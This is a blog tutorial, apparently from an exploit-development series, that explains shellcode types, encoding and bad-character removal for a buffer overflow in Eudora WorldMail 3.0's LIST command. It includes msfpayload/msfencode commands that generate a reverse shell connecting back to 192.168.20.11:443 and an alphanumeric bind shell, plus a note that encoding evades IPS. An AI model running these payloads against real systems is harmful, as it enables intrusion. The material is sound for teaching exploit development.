This post is the third in the Over The Flow series. In it I am going to explain what a shellcode is, what types of shellcode exist, and which types I will be injecting into our vulnerable application (if you don't know what the vulnerable application is, have a look at my previous posts). But first I am going to do some research on what shellcode means in a computer security context.
What is a Shellcode
In computer security, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine. Shellcode is commonly written in machine code, but any piece of code that performs a similar task can be called shellcode. Because the function of a payload is not limited to merely spawning a shell, some have suggested that the name shellcode is insufficient. However, attempts at replacing the term have not gained wide acceptance.
More specifically, a shellcode can be seen as a list of instructions developed in a manner that allows us to inject it into an application at runtime. Injecting shellcode into an application can be done through many different security holes, of which buffer overflows are the most popular.
Origin of the term Shellcode
The shellcode is the code of the shell, meaning code that provides you with a shell. A shell is a piece of software that provides an interface for users of an operating system and gives access to the services of a kernel. However, the term is also applied very loosely to applications and may include any software that is "built around" a particular component, such as web browsers and email clients that are "shells" for HTML rendering engines. The name shell originates from shells being an outer layer of interface between the user and the internals of the operating system (the kernel).
Operating system shells generally fall into one of two categories: command-line and graphical. Command-line shells provide a command-line interface (CLI) to the operating system, while graphical shells provide a graphical user interface (GUI). In either category the primary purpose of the shell is to invoke or "launch" another program; however, shells frequently have additional capabilities such as viewing the contents of directories. For the purposes of this post, a shell means an interactive command prompt for the operating system.
Types of Shellcode
A shellcode can either be local or remote, depending on whether it gives an attacker control over the machine it runs on (local) or over another machine through a network (remote).
Local shellcode is used by an attacker who has limited access to a machine but can exploit a vulnerability, for example a buffer overflow, in a higher-privileged process on that machine. If successfully executed, the shellcode will provide the attacker access to the machine with the same higher privileges as the targeted process.
Remote shellcode is used when an attacker wants to target a vulnerable process running on another machine on a local network or intranet. If successfully executed, the shellcode can provide the attacker access to the target machine across the network. Remote shellcodes normally use standard TCP/IP socket connections to allow the attacker access to the shell on the target machine. Such shellcode can be categorized based on how this connection is set up: if the shellcode itself establishes the connection, it is called a "reverse shell" or connect-back shellcode, because the shellcode connects back to the attacker's machine.
On the other hand, if the attacker needs to create the connection, the shellcode is called a bindshell because the shellcode binds to a certain port on which the attacker can connect to control it. A third type, much less common, is socket-reuse shellcode. This type of shellcode is sometimes used when an exploit establishes a connection to the vulnerable process that is not closed before the shellcode is run. The shellcode can then re-use this connection to communicate with the attacker. Socket re-using shellcode is harder to create because the shellcode needs to find out which connection to re-use and the machine may have many connections open.
Download and execute types of Shellcodes
Download and execute is a type of remote shellcode that downloads and executes some form of malware on the target system. This type of shellcode does not spawn a shell, but rather instructs the machine to download a certain executable file off the network, save it to disk and execute it. A variation of this type of shellcode downloads and loads a library. Advantages of this technique are that the code can be smaller, that it does not require the shellcode to spawn a new process on the target system, and that the shellcode does not need code to clean up the targeted process as this can be done by the library loaded into the process.
When the amount of data that an attacker can inject into the target process is too limited to execute useful shellcode directly, it may be possible to execute it in stages. First, a small piece of shellcode (stage 1) is executed. This code then downloads a larger piece of shellcode (stage 2) into the process's memory and executes it.
Egg-hunt shellcode is another form of staged shellcode, used when an attacker can inject a larger shellcode into the process but cannot determine where in the process it will end up. A small egg-hunt shellcode is injected into the process at a predictable location and executed. This code then searches the process's address space for the larger shellcode (the egg) and executes it.
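To make the egg-hunt idea more concrete, here is a minimal Python sketch that simulates the search on a plain byte string instead of real process memory. The 4-byte tag w00t, the doubled-tag convention and the name find_egg are my own assumptions for illustration; a real egg hunter is written in assembly and also has to cope with unreadable memory pages, which this sketch ignores.

```python
from typing import Optional

EGG_TAG = b"w00t"  # hypothetical 4-byte marker chosen for this sketch


def find_egg(memory: bytes, tag: bytes = EGG_TAG) -> Optional[int]:
    """Return the offset of the payload that follows the doubled tag, or None."""
    # The tag is doubled so the hunter does not match its own single copy of it.
    marker = tag + tag
    position = memory.find(marker)
    if position == -1:
        return None
    return position + len(marker)


# Simulated memory: padding, the hunter's own single tag, filler, then the egg.
stage2 = b"\xcc" * 8  # placeholder bytes standing in for the larger shellcode
memory = b"\x00" * 32 + EGG_TAG + b"\x90" * 16 + EGG_TAG + EGG_TAG + stage2 + b"\x00" * 8
offset = find_egg(memory)
```

The single copy of the tag at the start is skipped, and offset ends up pointing at the first byte after the doubled tag, which is where the second stage begins.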
Shellcode execution strategy
An exploit will commonly inject a shellcode into the target process before or at the same time as it exploits a vulnerability to gain control over the program counter. The program counter is adjusted to point to the shellcode, after which it gets executed and performs its task. Injecting the shellcode is often done by storing the shellcode in data sent over the network to the vulnerable process, by supplying it in a file that is read by the vulnerable process or through the command line or environment in the case of local exploits.
Why Shellcode encoding
Because most processes filter or restrict the data that can be injected, shellcode often needs to be written to allow for these restrictions. This includes making the code small, null-free or alphanumeric. Various solutions have been found to get around such restrictions, including:
- Design and implementation optimizations to decrease the size of the shellcode.
- Implementation modifications to get around limitations in the range of bytes used in the shellcode.
- Self-modifying code that modifies a number of the bytes of its own code before executing them to re-create bytes that are normally impossible to inject into the process.
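Before worrying about how to get around such restrictions, it helps to check whether a given payload violates them at all. The following is a minimal Python sketch of such checks; the function names and the sample bytes are hypothetical and only illustrate the null-free and alphanumeric constraints mentioned above.

```python
import string
from typing import List

# Byte values of A-Z, a-z and 0-9.
ALPHANUMERIC = set((string.ascii_letters + string.digits).encode("ascii"))


def is_null_free(payload: bytes) -> bool:
    """True if the payload contains no 0x00 byte."""
    return 0 not in payload


def is_alphanumeric(payload: bytes) -> bool:
    """True if every byte of the payload is an ASCII letter or digit."""
    return all(byte in ALPHANUMERIC for byte in payload)


def forbidden_offsets(payload: bytes, bad: bytes) -> List[int]:
    """Return the offsets of all bytes that appear in the forbidden set."""
    return [index for index, byte in enumerate(payload) if byte in bad]


sample = b"\x41\x00\x42\x0a"  # made-up bytes, not real shellcode
offsets = forbidden_offsets(sample, b"\x00\x0a\x0d")
```

For the sample above, is_null_free returns False and offsets lists the positions of the two forbidden bytes.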
There are tons of shellcode repositories all around the Internet, and the Metasploit project seems to be the best of them. Writing an exploit can be difficult, though: what happens when all of the pre-written blocks of code cease to work? You need to write your own! Hopefully this tutorial will give you a good head start.
Finding your own Shellcode
Believe it or not, you do not have to use msfpayload to get a shellcode: you can get all types of shellcode from the Shell-Storm website. Shell-Storm.org is a development organization based on GNU/Linux systems that provides free projects and source code. Of course, in order to use this type of shellcode you might have to know a little about assembly :(, but that is life with shellcoding, right? A funny shellcode is the beep shellcode, which obviously does one thing: it beeps. According to its description, the shellcode can be changed to work with any Windows distribution by changing the address of Beep in kernel32.dll, and addresses are given for SP1 and SP2. Another website to download shellcodes from is of course exploit-db. I should also remind you that I already generated a shellcode using the msfpayload tool, so I am not going to waste any more time on shellcodes from the Internet.
Generating your own Shellcode using msfpayload
In order to generate your own shellcode you can use the msfpayload utility (although if you want to do it properly you would have to write your own shellcodes!!). msfpayload is a command-line instance of Metasploit that is used to generate and output all of the various types of shellcode that are available in Metasploit. The most common use of this tool is the generation of shellcode for an exploit that is not currently in the Metasploit Framework, or for testing different types of shellcode and options before finalizing an exploit.
This is a sample msfpayload command usage:
Note: This command shows you the options for the shellcode you would like to generate. The default port is 4444, a nice port to start a pen-test with.
As we can see from the output, we can configure three different options with this specific payload. For each option the output shows whether it is required, whether it comes with a default setting, and a short description:
- Exit function: default setting is process
- Listening port: default setting is 4444
- The third option: not required, no default setting
Note: The exit function is related to the type of the exploit. Some exploits might not work if you choose the wrong type of exit. For example, an SEH exploit such as ours would probably have to exit using the SEH exit function. In any case you might have to brute force the vulnerability, which might also crash the service, so it is not a good idea.
Now that all of that is configured, the only option left is to specify the output type such as C, Perl, Raw, etc. For this example we are going to output our shellcode as C.
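As a rough illustration of what a C-style output looks like, here is a small Python sketch that formats raw bytes as a C string literal. The function name to_c_array, the variable name buf and the line width are assumptions of mine and not msfpayload's actual formatting, and the bytes are placeholders rather than real shellcode.

```python
def to_c_array(payload: bytes, name: str = "buf", width: int = 8) -> str:
    """Format raw bytes as a C unsigned char array built from string literals."""
    lines = []
    for start in range(0, len(payload), width):
        chunk = payload[start:start + width]
        # Each byte becomes a \xNN escape inside a quoted C string.
        lines.append('"' + "".join(f"\\x{byte:02x}" for byte in chunk) + '"')
    body = "\n".join(lines)
    return f"unsigned char {name}[] =\n{body};"


c_source = to_c_array(b"\xcc\xcc\xcc", width=2)
print(c_source)
```

Adjacent string literals are concatenated by the C compiler, which is why the output can be split over several lines.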
Generating your own Shellcode using msfvenom
The utility msfvenom is a combination of msfpayload and msfencode, putting both of these tools into a single framework instance. The advantages of msfvenom are:
- One single tool
- Standardized command line options
- Increased speed
An example of the usage of msfvenom can be seen below:
Note: The command above generates a Windows bind shell shellcode encoded with three iterations of the shikata_ga_nai encoder and without any null bytes.
Note: You can also generate your shellcode from the console by issuing a show payloads command and then typing generate. The generate command can also take care of things such as encoding and removing bad characters.
Increasing Shellcode execution probability
There are cases where you need a purely alphanumeric shellcode because of character filtering in the exploited application. msfpayload can generate alphanumeric shellcode easily through msfencode. Bad characters can also have a number of different effects on an exploit, so you will want to remove them too. Finally, character-encoding transformations can also be a problem, so producing Unicode-proof shellcode is something you should be able to do.
Alphanumeric and printable Shellcode
In certain circumstances, a target process will filter any byte from the injected shellcode that is not a printable or alphanumeric character. Under such circumstances, the range of instructions that can be used to write a shellcode becomes very limited. A solution to this problem was published by Rix in Phrack 57 in which he showed it was possible to turn any code into alphanumeric code. A technique often used is to create self-modifying code, because this allows the code to modify its own bytes to include bytes outside of the normally allowed range, thereby expanding the range of instructions it can use. Using this trick, a self-modifying decoder can be created that initially uses only bytes in the allowed range. The main code of the shellcode is encoded, also only using bytes in the allowed range. When the output shellcode is running, the decoder can modify its own code to be able to use any instruction it requires to function properly and then continues to decode the original shellcode. After decoding the shellcode the decoder transfers control to it, so it can be executed as normal. It has been shown that it is possible to create arbitrarily complex shellcode that looks like normal text in English.
msfpayload windows/shell/bind_tcp R | ./msfencode -e x86/alpha_mixed
Note: This command converts your shellcode to alphanumeric. This can also be used to bypass host-based IPS software or network-based IPS devices.
Modern programs use Unicode strings to allow internationalization of text. Often, these programs will convert incoming ASCII strings to Unicode before processing them. Unicode strings encoded in UTF-16 use two bytes to encode each character (or four bytes for some special characters). When an ASCII string is transformed into UTF-16, a zero byte is inserted after each byte in the original string. Obscou proved in Phrack 61 that it is possible to write shellcode that can run successfully after this transformation. Programs that can automatically encode any shellcode into alphanumeric UTF-16-proof shellcode exist, based on the same principle of a small self-modifying decoder that decodes the original shellcode. You can find out about Unicode characters here.
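The effect of the ASCII to UTF-16 transformation is easy to see in Python. This is only a sketch of the byte expansion itself, assuming little-endian UTF-16 as used on Windows; the helper name ascii_to_utf16le is hypothetical, and a real target may use a code page conversion that treats bytes above 0x7F differently.

```python
def ascii_to_utf16le(data: bytes) -> bytes:
    """Expand ASCII bytes the way an ASCII to UTF-16LE conversion would."""
    # decode() raises UnicodeDecodeError for bytes above 0x7F, which are not ASCII.
    return data.decode("ascii").encode("utf-16-le")


expanded = ascii_to_utf16le(b"ABC")
print(expanded)  # every original byte is now followed by a zero byte
```

Any shellcode that has to survive this conversion must still be valid code once a zero byte has been placed after each of its bytes, which is exactly the constraint described above.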
Removing bad characters in your Shellcode
Bad characters can have a number of different effects in an exploit. Sometimes they get translated to one or more other characters, or they get removed from the string entirely, in which case you work out which characters are bad by examining the memory dump in the debugger, finding your buffer, and seeing which characters are missing or have changed. In other cases however, bad characters seem to completely change the structure of the buffer, and simple memory examination won't tell you which ones are missing.
The command to avoid these types of problems is:
msfpayload windows/shell_reverse_tcp LHOST=192.168.20.11 LPORT=443 R | msfencode -a x86 -b '\x00\x0a\x0d' -t c
Note: This command removes the bad characters \x00, \x0a and \x0d (remember from previous posts that these characters were used for header injection attacks in Web Applications).
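Working out which characters are bad by comparing what you sent with what ended up in memory can be sketched in Python as follows. This assumes you have already copied the relevant bytes out of the debugger's memory dump by hand; the function names and the simulated dump are hypothetical.

```python
from typing import Optional, Tuple


def all_byte_values(exclude: bytes = b"") -> bytes:
    """Return every byte value 0x00-0xFF in order, minus known bad characters."""
    return bytes(value for value in range(256) if value not in exclude)


def compare_with_dump(sent: bytes, dumped: bytes) -> Optional[Tuple[int, int, Optional[int]]]:
    """Return (offset, sent byte, dumped byte) for the first mismatch, or None."""
    for offset, sent_byte in enumerate(sent):
        if offset >= len(dumped):
            return offset, sent_byte, None  # the buffer was cut short here
        if dumped[offset] != sent_byte:
            return offset, sent_byte, dumped[offset]  # the byte was altered
    return None


sent = all_byte_values(exclude=b"\x00")
# Simulated dump in which the buffer was truncated at the first 0x0a byte.
dumped = sent[:sent.index(0x0A)]
mismatch = compare_with_dump(sent, dumped)
```

Each mismatch gives you one more candidate bad character to add to the exclusion list before sending the test buffer again.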
The INT 3 interrupt call
The INT instruction is an assembly language instruction for x86 processors that generates a software interrupt. It takes the interrupt number formatted as a byte value. When written in assembly language, the instruction is written like this:
INT X
Note: Where X is the software interrupt that should be generated.
The INT 3 instruction is defined for use by debuggers to temporarily replace an instruction in a running program in order to set a breakpoint. It has its own one-byte opcode, whereas other INT instructions are encoded using two bytes, which makes them unsuitable for patching instructions (which can be one byte long). For more information see SIGTRAP.
When writing exploits, the opcode for INT 3 is used to test our shellcode and make it functional. The opcode of the INT 3 software interrupt is 0xCC in hexadecimal. So for our example, when we want to inject a shellcode we will first inject software interrupts in the position of the possible shellcode and work our way from there.
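In Python, a block of INT 3 opcodes that stands in for the shellcode can be built like this. The helper name breakpoint_placeholder and the size of 32 bytes are assumptions for illustration only; the size you actually need depends on the space available in the target buffer.

```python
INT3 = b"\xcc"  # one-byte opcode of the INT 3 instruction


def breakpoint_placeholder(size: int) -> bytes:
    """Return `size` INT 3 opcodes to stand in for a shellcode of that size."""
    if size < 0:
        raise ValueError("size must be non-negative")
    return INT3 * size


placeholder = breakpoint_placeholder(32)  # 32 is an arbitrary example size
```

If the debugger stops on a breakpoint inside this block, execution has reached the spot where the real shellcode would be placed.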
Shellcode injection methodology
So the method used to inject a shellcode into an application and run it is:
- Go through the implementation details of the technology in the RFCs (e.g. the IMAP4 RFC) and identify possible implementation issues. For our exploit development, the IMAP4 RFC helped us identify the bad handling of the bracket character.
- Fuzz the application in order to create an overflow, crash the vulnerable program and identify the proper attack vector. For Eudora Qualcomm WorldMail 3.0 it was the LIST command. In our application I used a large buffer of A's ending with the } character.
- Identify the exact buffer size that crashes the vulnerable application, if needed. Again, for our exploit development example we found out that the IMAP4 server crashes with A*125+}, or as a Python string '\x41' * 125 + '\x7D'. We also calculated the space available to insert the shellcode, but this is shown in the next post.
- Use the Metasploit pattern_create and pattern_offset tools to identify the exact position of the EIP address. In our vulnerable program we managed to identify the position of the EIP and overwrote it with 4 C's.
- Inject the shellcode and debug the vulnerable application using INT3 software interrupts. Repeat the same process until you have a working shellcode. This part is used for proper positioning of the shell.
Note: See how linear the process of injecting the shellcode is.
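The fuzzing string and the pattern-based offset search from the steps above can be sketched in Python. The crash string is the one given in this post; the pattern generator only imitates the upper/lower/digit style of Metasploit's pattern_create and is not guaranteed to match its output byte for byte, and all function names here are hypothetical.

```python
import string
from itertools import product


def fuzz_string(count: int = 125) -> bytes:
    """Build the crash string from this post: 125 A's followed by }."""
    return b"\x41" * count + b"\x7d"


def cyclic_pattern(length: int) -> bytes:
    """Build a non-repeating pattern such as Aa0Aa1Aa2... up to `length` bytes."""
    chunks = []
    triples = product(string.ascii_uppercase, string.ascii_lowercase, string.digits)
    for upper, lower, digit in triples:
        if len(chunks) * 3 >= length:
            break
        chunks.append(upper + lower + digit)
    # At most 26 * 26 * 10 * 3 = 20280 bytes can be produced this way.
    return "".join(chunks)[:length].encode("ascii")


def pattern_offset(pattern: bytes, value: bytes) -> int:
    """Return the offset of `value` (bytes in memory order) or -1 if absent."""
    return pattern.find(value)


pattern = cyclic_pattern(200)
offset = pattern_offset(pattern, pattern[130:134])
```

When reading the overwritten EIP from the debugger, remember that x86 is little-endian, so the register value has to be converted to memory byte order before looking it up.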
The Shellcode for our vulnerable server
We want to exploit the Eudora Qualcomm WorldMail 3.0 software, and more specifically a buffer overflow in the LIST command, as explained in previous posts (the Over The Flow Post Part 1). If you have a look at the exploit that we are trying to replicate, you will see that the shellcode used is a staged shellcode, also called a two-part shellcode. You will also find that the first stage does not download the second part. The first stage of the shellcode is a 42-byte code that points to the second part, which is the true shellcode that binds a shell to port 4444. This means that when the first stage is executed, it searches for the second stage and executes it.
So this is the first stage shellcode (directly taken from the exploit):
# Using Msf::Encoder::PexFnstenvMov with final size of 42 bytes
# First Stage Shellcode
So this is the second stage shellcode (directly taken from the exploit):
# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
# Second Stage Shellcode
In the next part I will finally inject the shellcode. As you can already see, things become more and more complicated.